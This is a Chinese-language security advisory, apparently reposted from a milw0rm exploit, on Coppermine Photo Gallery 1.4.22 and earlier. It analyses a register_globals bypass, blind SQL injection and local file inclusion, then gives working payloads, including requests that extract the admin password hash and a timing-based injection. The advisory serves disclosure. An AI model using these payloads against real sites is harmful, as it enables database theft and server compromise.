影响版本:
Coppermine Photo Gallery <= 1.4.22
程序介绍:
Coppermine是用PHP编写的多用途集成Web图形库脚本。
漏洞分析:
在Coppermine的/includes/init.inc.php文件的42-65行,远程攻击者可以绕过防register_global保护,执行SQL盲注或本地文件包含攻击:
- $keysToSkip = array(‘_POST’, ‘_GET’, ‘_COOKIE’, ‘_REQUEST’, ‘_SERVER’, ‘HTML_SUBST’, ‘keysToSkip’, ‘register_globals_flag’, ‘cpgdebugger’);
- if (ini_get(‘register_globals’) == ‘1’ || strtolower(ini_get(‘register_globals’)) == ‘on’) {
- $register_globals_flag = true;
- } else {
- $register_globals_flag = false;
- }
- if (get_magic_quotes_gpc()) {
- if (is_array($_POST)) {
- foreach ($_POST as $key => $value) {
- if (!is_array($value))
- $_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
- if (!in_array($key, $keysToSkip) && isset($$key) && $register_globals_flag) unset($$key);
- }
- }
- if (is_array($_GET)) {
- foreach ($_GET as $key => $value) {
- unset($_GET[$key]);
- $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
- if (!in_array($key, $keysToSkip) && isset($$key) && $register_globals_flag) unset($$key);
- }
- }
$_COOKIE和$_SERVER变量存在同样问题。在magic_quotes_gpc = off时,可绕过保护通过GET或POST请求定义GLOBALS。
以下是exploit攻击的方式。在./thumbnails.php文件的79行:
- if (isset($_GET[‘sort’])) $USER[‘sort’] = $_GET[‘sort’];
- if (isset($_GET[‘cat’])) $cat = (int)$_GET[‘cat’]; <== bypass the int cast
- if (isset($_GET[‘album’])) $album = $_GET[‘album’];
- …
- if (is_numeric($album)) {
- …
- } else {
- $album_set_array = array();
- if ($cat == USER_GAL_CAT)
- $where = ‘category > ‘ . FIRST_USER_CAT;
- else
- $where = "category = ‘$cat’";
- $result = cpg_db_query("SELECT aid FROM {$CONFIG[‘TABLE_ALBUMS’]} WHERE $where"); <== Vulnerable query
—————————————————————————————–
还可以通过本地文件包含覆盖$USER数组,具体来说是$USER[‘lang’]变量。在/include/functions.inc.php文件的128-135行:
- function user_get_profile()
- {
- global $CONFIG, $USER;
- if (isset($_COOKIE[$CONFIG[‘cookie_name’].‘_data’])) {
- $USER = @unserialize(@base64_decode($_COOKIE[$CONFIG[‘cookie_name’].‘_data’]));
- $USER[‘lang’] = strtr($USER[‘lang’], ‘$/\\:*?"\'<>|`’, ‘____________’); <== we bypass it
- }
- if (!isset($USER[‘ID’]) || strlen($USER[‘ID’]) != 32) {
- list($usec, $sec) = explode(‘ ‘, microtime());
- $seed = (float) $sec + ((float) $usec * 100000);
- srand($seed);
- $USER=array(‘ID’ => md5(uniqid(rand(),1)));
- } else {
- $USER[‘ID’] = addslashes($USER[‘ID’]);
- }
- if (!isset($USER[‘am’])) $USER[‘am’] = 1;
- }
/includes/init.inc.php文件的318-346行:
- if (isset($USER[‘lang’]) && !strstr($USER[‘lang’], ‘/’) && file_exists(‘lang/’ . $USER[‘lang’] . ‘.php’))
- {
- $CONFIG[‘default_lang’] = $CONFIG[‘lang’]; // Save default language
- $CONFIG[‘lang’] = strtr($USER[‘lang’], ‘$/\\:*?"\'<>|`’, ‘____________’);
- }
- elseif ($CONFIG[‘charset’] == ‘utf-8’) <== default configuration
- {
- include(‘include/select_lang.inc.php’);
- if (file_exists(‘lang/’ . $USER[‘lang’] . ‘.php’))
- {
- $CONFIG[‘default_lang’] = $CONFIG[‘lang’]; // Save default language
- $CONFIG[‘lang’] = $USER[‘lang’];
- }
- }
- else
- {
- unset($USER[‘lang’]);
- }
- if (isset($CONFIG[‘default_lang’]) && ($CONFIG[‘default_lang’]==$CONFIG[‘lang’]))
- {
- unset($CONFIG[‘default_lang’]);
- }
- if (!file_exists("lang/{$CONFIG[‘lang’]}.php"))
- $CONFIG[‘lang’] = ‘english’;
- // We load the chosen language file
- require "lang/{$CONFIG[‘lang’]}.php"; <== vulnerable include
—————————————————————————————–
如果启用了注册功能,能够通过口令创建或修改相册的用户可以执行sql盲注。
./db_input.php文件:
- $event = isset($_POST[‘event’]) ? $_POST[‘event’] : $_GET[‘event’];
- switch ($event) {
- …
- case ‘album_update’:
- if (!(USER_ADMIN_MODE || GALLERY_ADMIN_MODE)) cpg_die(ERROR, $lang_errors[‘perm_denied’], __FILE__, __LINE__); <== USER_ADMIN_MODE is TRUE if we are logged in
- $aid = (int)$_POST[‘aid’];
- $title = addslashes(trim($_POST[‘title’]));
- $category = (int)$_POST[‘category’];
- $description = addslashes(trim($_POST[‘description’]));
- $keyword = addslashes(trim($_POST[‘keyword’]));
- $thumb = (int)$_POST[‘thumb’];
- $visibility = (int)$_POST[‘visibility’];
- $uploads = $_POST[‘uploads’] == ‘YES’ ? ‘YES’ : ‘NO’;
- $comments = $_POST[‘comments’] == ‘YES’ ? ‘YES’ : ‘NO’;
- $votes = $_POST[‘votes’] == ‘YES’ ? ‘YES’ : ‘NO’;
- $password = $_POST[‘alb_password’]; <== this var is not addslashed
- $password_hint = addslashes(trim($_POST[‘alb_password_hint’]));
- $visibility = !emptyempty($password) ? FIRST_USER_CAT + USER_ID : $visibility;
- if (!$title) cpg_die(ERROR, $lang_db_input_php[‘alb_need_title’], __FILE__, __LINE__);
- if (GALLERY_ADMIN_MODE) {
- $query = "UPDATE {$CONFIG[‘TABLE_ALBUMS’]} SET title=’$title’, description=’$description’, category=’$category’, thumb=’$thumb’, uploads=’$uploads’, comments=’$comments’, votes=’$votes’, visibility=’$visibility’, alb_password=’$password’, alb_password_hint=’$password_hint’, keyword=’$keyword’ WHERE aid=’$aid’ LIMIT 1";
- } else {
- $category = FIRST_USER_CAT + USER_ID;
- $query = "UPDATE {$CONFIG[‘TABLE_ALBUMS’]} SET title=’$title’, description=’$description’, thumb=’$thumb’, comments=’$comments’, votes=’$votes’, visibility=’$visibility’, alb_password=’$password’, <== vulnerable query alb_password_hint=’$password_hint’,keyword=’$keyword’ WHERE aid=’$aid’ AND category=’$category’ LIMIT 1";
- }
- $update = cpg_db_query($query);
在查询中使用之前没有对$_POST[‘alb_password’]执行addslash操作。init.inc.php中过滤了所有_GET、_POST和_REQUEST变量:
- // Do some cleanup in GET, POST and cookie data and un-register global vars
- $HTML_SUBST = array(‘&’ => ‘&’, ‘"’ => ‘"’, ‘<‘ => ‘<‘, ‘>’ => ‘>’, ‘%26’ => ‘&’, ‘%22’ => ‘"’, ‘%3C’ => ‘<‘, ‘%3E’ => ‘>’,‘%27’ => ”’, "‘" => ‘”);
- …
- $_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
- …
- $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
- …
- $_REQUEST[$key] = strtr(stripslashes($value), $HTML_SUBST);
但没有处理反斜线(\),因此可以操作查询在$_POST[‘alb_password’]的默认注入反斜线并在$_POST[‘alb_password_hint’]参数中执行SQL。
——————————————————————————————
某些配置的Coppermine中还存在一些SQL盲注。在./displayecard.php文件的26-38行:
- if (!isset($_GET[‘data’])) cpg_die(CRITICAL_ERROR, $lang_errors[‘param_missing’], __FILE__, __LINE__);
- $data = array();
- $data = @unserialize(@base64_decode($_GET[‘data’]));
- // attempt to obtain full link from db if ecard logging enabled and min 12 chars of data is provided and only 1 match
- if ((!is_array($data)) && $CONFIG[‘log_ecards’] && (strlen($_GET[‘data’]) > 12)) {
- $result = cpg_db_query("SELECT link FROM {$CONFIG[‘TABLE_ECARDS’]} WHERE link LIKE ‘{$_GET[‘data’]}%’");
- if (mysql_num_rows($result) === 1) {
- $row = mysql_fetch_assoc($result);
- $data = @unserialize(@base64_decode($row[‘link’]));
- }
- }
漏洞利用:
[target]/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999′ OR 1=1%23 true
[target]/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999′ OR 1=2%23 false
GET /[path]/index.php?GLOBALS[USER][ID]=5b83a5f92603efcdb65d47c9a2991d6b&GLOBALS[USER][lang]=../README.txt%00 HTTP/1.1
Host: [host]
Connection: close
POST /[path]/db_input.php HTTP/1.1
Host: [host]
Keep-Alive: 300
Connection: keep-alive
Cookie: [your_cookies]
Content-Type: application/x-www-form-urlencoded
event=album_update&title=x&aid=[YOUR_ALBUM_ID]&alb_password=%5C&alb_password_hint=,title=(SELECT user_password FROM cpg14x_users WHERE user_id=1) WHERE aid=[YOUR_ALBUM_ID]%23
用以下php代码注入:
<?php
$injection = "%’ OR BENCHMARK(999999, md5(0))#";
$injection = urlencode(base64_encode(serialize($injection)));
?>
然后:
GET http://[host]/[path]/displayecard.php?data=[$injection] HTTP/1.1
解决方案:
厂商补丁:
Coppermine
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.chezgreg.net/coppermine/
信息来源:
<*来源:GiReX
链接:http://www.milw0rm.com/exploits/8713
http://secunia.com/advisories/35144/
0 条评论。